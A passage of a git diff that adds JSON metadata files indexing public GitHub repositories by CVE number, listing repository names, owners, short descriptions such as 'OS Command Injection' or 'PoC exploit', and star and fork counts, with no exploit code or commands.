"updated_at": "2022-05-25T02:23:05Z", + "pushed_at": "2022-05-24T17:27:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 505571322, + "name": "CVE-2021-46422", + "full_name": "Chocapikk\/CVE-2021-46422", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-46422", + "description": "Telesquare SDT-CW3B1 1.1.0 - OS Command Injection", + "fork": false, + "created_at": "2022-06-20T19:24:55Z", + "updated_at": "2024-08-12T20:24:19Z", + "pushed_at": "2022-10-16T15:20:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 513717270, + "name": "CVE-2021-46422_PoC", + "full_name": "twoning\/CVE-2021-46422_PoC", + "owner": { + "login": "twoning", + "id": 107823435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107823435?v=4", + "html_url": "https:\/\/github.com\/twoning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twoning\/CVE-2021-46422_PoC", + "description": "CVE-2021-46422_PoC", + "fork": false, + "created_at": "2022-07-14T01:10:18Z", + "updated_at": "2022-07-14T01:19:06Z", + "pushed_at": "2022-07-14T01:19:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551939049, + "name": "CVE-RCE", + "full_name": "Awei507\/CVE-RCE", + "owner": { + "login": "Awei507", + "id": 107920786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107920786?v=4", + "html_url": "https:\/\/github.com\/Awei507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Awei507\/CVE-RCE", + "description": "CVE-2021-46422漏洞", + "fork": false, + "created_at": "2022-10-15T12:46:31Z", + "updated_at": "2023-07-13T03:06:42Z", + "pushed_at": "2022-10-15T13:44:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551993811, + "name": "CVE-2021-46422_RCE", + "full_name": "yigexioabai\/CVE-2021-46422_RCE", + "owner": { + "login": "yigexioabai", + "id": 110800918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110800918?v=4", + "html_url": "https:\/\/github.com\/yigexioabai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yigexioabai\/CVE-2021-46422_RCE", + "description": null, + "fork": false, + "created_at": "2022-10-15T15:13:48Z", + "updated_at": "2022-10-15T15:14:29Z", + "pushed_at": "2022-10-15T15:14:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552255524, + "name": "CVE-2021-46422", + "full_name": "ZAxyr\/CVE-2021-46422", + "owner": { + "login": "ZAxyr", + "id": 115866621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115866621?v=4", + "html_url": "https:\/\/github.com\/ZAxyr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZAxyr\/CVE-2021-46422", + "description": "SDT-CW3B1韩国的无线路由器 os cmd 注入PoC", + "fork": false, + "created_at": "2022-10-16T06:52:57Z", + "updated_at": "2022-10-16T07:09:44Z", + "pushed_at": "2022-10-16T07:09:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552302104, + "name": "SDT_CW3B1_rce", + "full_name": "xanszZZ\/SDT_CW3B1_rce", + "owner": { + "login": "xanszZZ", + "id": 115653953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115653953?v=4", + "html_url": "https:\/\/github.com\/xanszZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xanszZZ\/SDT_CW3B1_rce", + "description": "批量检测CVE-2021-46422 RCE漏洞", + "fork": false, + "created_at": "2022-10-16T09:23:56Z", + "updated_at": "2022-10-17T06:36:12Z", + "pushed_at": "2022-10-16T15:09:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552307425, + "name": "CVE-2021-46422", + "full_name": "latings\/CVE-2021-46422", + "owner": { + "login": "latings", + "id": 112951518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112951518?v=4", + "html_url": "https:\/\/github.com\/latings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latings\/CVE-2021-46422", + "description": "CVE-2021-46422", + "fork": false, + "created_at": "2022-10-16T09:40:29Z", + "updated_at": "2022-10-18T09:07:55Z", + "pushed_at": "2022-10-16T09:49:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552330773, + "name": "cve-2021-46422", + "full_name": "CJ-0107\/cve-2021-46422", + "owner": { + "login": "CJ-0107", + "id": 112550674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112550674?v=4", + "html_url": "https:\/\/github.com\/CJ-0107", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CJ-0107\/cve-2021-46422", + "description": "cve-2021-46422", + "fork": false, + "created_at": "2022-10-16T10:52:27Z", + "updated_at": "2022-10-16T10:53:24Z", + "pushed_at": "2022-10-16T10:53:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552333838, + "name": "CVE-2021-46422", + "full_name": "kelemaoya\/CVE-2021-46422", + "owner": { + "login": "kelemaoya", + "id": 115539074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115539074?v=4", + "html_url": "https:\/\/github.com\/kelemaoya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kelemaoya\/CVE-2021-46422", + "description": "韩国的无线路由器 os cmd 注入", + "fork": false, + "created_at": "2022-10-16T11:01:58Z", + "updated_at": "2022-10-16T11:07:39Z", + "pushed_at": "2022-10-16T11:07:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552344446, + "name": "CVE-2021-46422", + "full_name": "yyqxi\/CVE-2021-46422", + "owner": { + "login": "yyqxi", + "id": 115715353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115715353?v=4", + "html_url": "https:\/\/github.com\/yyqxi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yyqxi\/CVE-2021-46422", + "description": "CVE-2021-46422poc", + "fork": false, + "created_at": "2022-10-16T11:34:26Z", + "updated_at": "2023-02-26T11:45:09Z", + "pushed_at": "2022-10-16T11:47:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552374583, + "name": "CVE-2021-46422-poc", + "full_name": "polerstar\/CVE-2021-46422-poc", + "owner": { + "login": "polerstar", + "id": 115876062, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115876062?v=4", + "html_url": "https:\/\/github.com\/polerstar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/polerstar\/CVE-2021-46422-poc", + "description": "漏洞检测", + "fork": false, + "created_at": "2022-10-16T13:00:59Z", + "updated_at": "2022-10-18T09:07:36Z", + "pushed_at": "2022-10-16T13:01:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552430925, + "name": "CVE-2021-46422", + "full_name": "kailing0220\/CVE-2021-46422", + "owner": { + "login": "kailing0220", + "id": 115863969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4", + "html_url": "https:\/\/github.com\/kailing0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kailing0220\/CVE-2021-46422", + "description": "Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。", + "fork": false, + "created_at": "2022-10-16T15:24:45Z", + "updated_at": "2022-10-17T05:39:28Z", + "pushed_at": "2022-10-16T15:26:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653398565, + "name": "CVE-2021-46422", + "full_name": "tucommenceapousser\/CVE-2021-46422", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2021-46422", + "description": null, + "fork": false, + "created_at": "2023-06-14T01:35:08Z", + "updated_at": "2023-06-14T01:35:23Z", + "pushed_at": "2023-06-14T01:35:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46702.json b/2021/CVE-2021-46702.json new file mode 100644 index 0000000000..fa0d72692a --- /dev/null +++ b/2021/CVE-2021-46702.json @@ -0,0 +1,33 @@ +[ + { + "id": 463866526, + "name": "CVE-2021-46702", + "full_name": "Exmak-s\/CVE-2021-46702", + "owner": { + "login": "Exmak-s", + "id": 38157380, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38157380?v=4", + "html_url": "https:\/\/github.com\/Exmak-s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exmak-s\/CVE-2021-46702", + "description": "Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory.", + "fork": false, + "created_at": "2022-02-26T13:52:44Z", + "updated_at": "2023-08-22T13:40:56Z", + "pushed_at": "2022-02-26T14:44:24Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46703.json b/2021/CVE-2021-46703.json new file mode 100644 index 0000000000..8d5d90300b --- /dev/null +++ b/2021/CVE-2021-46703.json @@ -0,0 +1,33 @@ +[ + { + "id": 637333881, + "name": "CVE-2021-46703", + "full_name": "BenEdridge\/CVE-2021-46703", + "owner": { + "login": "BenEdridge", + "id": 8308258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8308258?v=4", + "html_url": "https:\/\/github.com\/BenEdridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BenEdridge\/CVE-2021-46703", + "description": "Simple payload builder", + "fork": false, + "created_at": "2023-05-07T08:25:37Z", + "updated_at": "2023-05-07T11:40:10Z", + "pushed_at": "2023-05-08T01:19:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46704.json b/2021/CVE-2021-46704.json new file mode 100644 index 0000000000..0f2bf67c80 --- /dev/null +++ b/2021/CVE-2021-46704.json @@ -0,0 +1,71 @@ +[ + { + "id": 656683228, + "name": "CVE-2021-46704-POC", + "full_name": "MithatGuner\/CVE-2021-46704-POC", + "owner": { + "login": "MithatGuner", + "id": 25469973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25469973?v=4", + "html_url": "https:\/\/github.com\/MithatGuner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MithatGuner\/CVE-2021-46704-POC", + "description": "CVE-2021-46704 GenieACS Command Injection POC", + "fork": false, + "created_at": "2023-06-21T12:29:43Z", + "updated_at": "2023-09-19T18:06:55Z", + "pushed_at": "2023-06-21T12:34:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "acs", + "cve-2021-46704", + "cwmp", + "genieacs", + "tr069", + "tr181" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656996292, + "name": "CVE-2021-46704", + "full_name": "Erenlancaster\/CVE-2021-46704", + "owner": { + "login": "Erenlancaster", + "id": 50498704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50498704?v=4", + "html_url": "https:\/\/github.com\/Erenlancaster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Erenlancaster\/CVE-2021-46704", + "description": "CVE-2021-46704 Nuclei template", + "fork": false, + "created_at": "2023-06-22T05:03:15Z", + "updated_at": "2023-06-22T05:03:15Z", + "pushed_at": "2023-06-23T20:54:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-521.json b/2021/CVE-2021-521.json new file mode 100644 index 0000000000..75f8b506ac --- /dev/null +++ b/2021/CVE-2021-521.json @@ -0,0 +1,33 @@ +[ + { + "id": 668395633, + "name": "CVE-2021-521-Exploit", + "full_name": "NagendraPittu\/CVE-2021-521-Exploit", + "owner": { + "login": "NagendraPittu", + "id": 117686502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117686502?v=4", + "html_url": "https:\/\/github.com\/NagendraPittu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NagendraPittu\/CVE-2021-521-Exploit", + "description": "Lab Exploit (CVE-2021-521): App uses Java reflection to access Android system components, retrieving a list of all installed apps. Reflection accesses ApplicationPackageManager and PackageManagerService, exploiting vulnerability.", + "fork": false, + "created_at": "2023-07-19T17:49:46Z", + "updated_at": "2023-07-19T17:49:47Z", + "pushed_at": "2023-07-19T18:24:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-56789.json b/2021/CVE-2021-56789.json new file mode 100644 index 0000000000..7c4d7c953f --- /dev/null +++ b/2021/CVE-2021-56789.json @@ -0,0 +1,33 @@ +[ + { + "id": 670731375, + "name": "ds-cve-plugin", + "full_name": "DataSurgeon-ds\/ds-cve-plugin", + "owner": { + "login": "DataSurgeon-ds", + "id": 140544249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140544249?v=4", + "html_url": "https:\/\/github.com\/DataSurgeon-ds", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DataSurgeon-ds\/ds-cve-plugin", + "description": "A plugin for DataSurgeon that Extracts CVE Numbers From Text (e.g: CVE-2021-56789)", + "fork": false, + "created_at": "2023-07-25T17:49:53Z", + "updated_at": "2023-07-25T17:52:01Z", + "pushed_at": "2023-07-25T18:15:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-6857.json b/2021/CVE-2021-6857.json new file mode 100644 index 0000000000..00cffb9bf9 --- /dev/null +++ b/2021/CVE-2021-6857.json @@ -0,0 +1,36 @@ +[ + { + "id": 357789319, + "name": "CVE-2021-6857", + "full_name": "zi0n8\/CVE-2021-6857", + "owner": { + "login": "zi0n8", + "id": 65099918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65099918?v=4", + "html_url": "https:\/\/github.com\/zi0n8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zi0n8\/CVE-2021-6857", + "description": "Config files for my GitHub profile.", + "fork": false, + "created_at": "2021-04-14T05:50:48Z", + "updated_at": "2021-04-14T05:57:11Z", + "pushed_at": "2021-04-14T05:51:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "config", + "github-config" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-6901.json b/2021/CVE-2021-6901.json new file mode 100644 index 0000000000..8274f1eb04 --- /dev/null +++ b/2021/CVE-2021-6901.json @@ -0,0 +1,33 @@ +[ + { + "id": 402380923, + "name": "cve-2021-6901", + "full_name": "mooneee\/cve-2021-6901", + "owner": { + "login": "mooneee", + "id": 58715815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58715815?v=4", + "html_url": "https:\/\/github.com\/mooneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mooneee\/cve-2021-6901", + "description": "readme", + "fork": false, + "created_at": "2021-09-02T10:33:35Z", + "updated_at": "2021-09-02T10:34:07Z", + "pushed_at": "2021-09-02T10:33:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0155.json b/2022/CVE-2022-0155.json new file mode 100644 index 0000000000..39070f56e0 --- /dev/null +++ b/2022/CVE-2022-0155.json @@ -0,0 +1,33 @@ +[ + { + "id": 830527219, + "name": "CVE-2022-0155-PoC", + "full_name": "coana-tech\/CVE-2022-0155-PoC", + "owner": { + "login": "coana-tech", + "id": 66076970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66076970?v=4", + "html_url": "https:\/\/github.com\/coana-tech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coana-tech\/CVE-2022-0155-PoC", + "description": null, + "fork": false, + "created_at": "2024-07-18T12:57:18Z", + "updated_at": "2024-07-18T13:01:28Z", + "pushed_at": "2024-07-18T13:01:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0165.json b/2022/CVE-2022-0165.json new file mode 100644 index 0000000000..801196e9b1 --- /dev/null +++ b/2022/CVE-2022-0165.json @@ -0,0 +1,72 @@ +[ + { + "id": 676524045, + "name": "CVE-2022-0165-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-0165-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-0165-EXPLOIT", + "description": "A PoC exploit for CVE-2022-0165 - Page Builder KingComposer WordPress Plugin - ID Parameter Validation Bypass", + "fork": false, + "created_at": "2023-08-09T11:53:18Z", + "updated_at": "2023-08-09T12:01:12Z", + "pushed_at": "2023-08-09T11:59:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807412299, + "name": "CVE-2022-0165", + "full_name": "Cappricio-Securities\/CVE-2022-0165", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-0165", + "description": "WordPress Page Builder KingComposer <=2.9.6 - Open Redirect", + "fork": false, + "created_at": "2024-05-29T04:00:25Z", + "updated_at": "2024-06-24T09:29:49Z", + "pushed_at": "2024-06-24T09:29:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tools", + "cve-2022-0165", + "cve-2022-0165-poc", + "cve-2022-0165-scanner", + "open-redirect", + "wordpress-page-builder-kingcomposer" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0185.json b/2022/CVE-2022-0185.json new file mode 100644 index 0000000000..7a332b6030 --- /dev/null +++ b/2022/CVE-2022-0185.json @@ -0,0 +1,219 @@ +[ + { + "id": 449571398, + "name": "CVE-2022-0185", + "full_name": "Crusaders-of-Rust\/CVE-2022-0185", + "owner": { + "login": "Crusaders-of-Rust", + "id": 77638184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77638184?v=4", + "html_url": "https:\/\/github.com\/Crusaders-of-Rust", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Crusaders-of-Rust\/CVE-2022-0185", + "description": "CVE-2022-0185", + "fork": false, + "created_at": "2022-01-19T06:19:38Z", + "updated_at": "2024-09-19T03:04:05Z", + "pushed_at": "2022-04-25T04:11:33Z", + "stargazers_count": 366, + "watchers_count": 366, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 366, + "score": 0, + "subscribers_count": 39 + }, + { + "id": 452351785, + "name": "cve-2022-0185-crash-poc", + "full_name": "discordianfish\/cve-2022-0185-crash-poc", + "owner": { + "login": "discordianfish", + "id": 275966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/275966?v=4", + "html_url": "https:\/\/github.com\/discordianfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/discordianfish\/cve-2022-0185-crash-poc", + "description": null, + "fork": false, + "created_at": "2022-01-26T16:27:50Z", + "updated_at": "2022-06-21T02:30:36Z", + "pushed_at": "2022-01-26T16:45:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452756684, + "name": "CVE-2022-0185", + "full_name": "khaclep007\/CVE-2022-0185", + "owner": { + "login": "khaclep007", + "id": 45098044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45098044?v=4", + "html_url": "https:\/\/github.com\/khaclep007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khaclep007\/CVE-2022-0185", + "description": null, + "fork": false, + "created_at": "2022-01-27T16:24:35Z", + "updated_at": "2022-01-27T16:25:54Z", + "pushed_at": "2022-01-27T16:25:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 460788495, + "name": "CVE-2022-0185", + "full_name": "chenaotian\/CVE-2022-0185", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-0185", + "description": "CVE-2022-0185 POC and Docker and Analysis write up", + "fork": false, + "created_at": "2022-02-18T09:27:34Z", + "updated_at": "2024-09-09T06:13:30Z", + "pushed_at": "2022-05-24T11:18:03Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 478026026, + "name": "CVE-2022-0185-PipeVersion", + "full_name": "veritas501\/CVE-2022-0185-PipeVersion", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-0185-PipeVersion", + "description": "CVE-2022-0185 exploit rewritten with pipe primitive", + "fork": false, + "created_at": "2022-04-05T07:48:35Z", + "updated_at": "2024-08-12T20:22:10Z", + "pushed_at": "2022-04-05T08:56:26Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 481566916, + "name": "CVE-2022-0185-exploit", + "full_name": "featherL\/CVE-2022-0185-exploit", + "owner": { + "login": "featherL", + "id": 30528370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30528370?v=4", + "html_url": "https:\/\/github.com\/featherL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/featherL\/CVE-2022-0185-exploit", + "description": "CVE-2022-0185 exploit", + "fork": false, + "created_at": "2022-04-14T10:46:04Z", + "updated_at": "2022-11-03T02:15:44Z", + "pushed_at": "2022-11-02T13:01:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786640173, + "name": "CVE-2022-0185-Case-Study", + "full_name": "dcheng69\/CVE-2022-0185-Case-Study", + "owner": { + "login": "dcheng69", + "id": 145501807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145501807?v=4", + "html_url": "https:\/\/github.com\/dcheng69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcheng69\/CVE-2022-0185-Case-Study", + "description": null, + "fork": false, + "created_at": "2024-04-15T02:42:43Z", + "updated_at": "2024-05-10T01:22:51Z", + "pushed_at": "2024-05-09T17:07:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0219.json b/2022/CVE-2022-0219.json new file mode 100644 index 0000000000..47788fd5db --- /dev/null +++ b/2022/CVE-2022-0219.json @@ -0,0 +1,33 @@ +[ + { + "id": 450128440, + "name": "CVE-2022-0219", + "full_name": 